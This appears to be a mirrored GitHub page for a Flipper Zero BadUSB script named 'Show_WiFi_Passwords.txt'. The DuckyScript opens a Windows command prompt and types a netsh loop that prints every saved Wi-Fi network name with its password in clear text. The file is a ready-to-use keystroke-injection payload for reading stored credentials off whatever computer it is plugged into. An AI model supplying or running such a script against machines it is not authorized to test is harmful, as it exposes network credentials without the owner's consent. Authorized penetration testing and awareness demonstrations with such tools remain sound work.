1
0
mirror of https://github.com/UberGuidoZ/Flipper.git synced 2025-02-24 13:33:44 +00:00
Flipper/BadUSB/Show_WiFi_Passwords.txt

8 lines
223 B
Plaintext

GUI r
DELAY 1000
STRING cmd
ENTER
DELAY 1000
STRING for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | netsh wlan show profiles %j key=clear | findstr /C:"SSID name" /C:"Key Content"
ENTER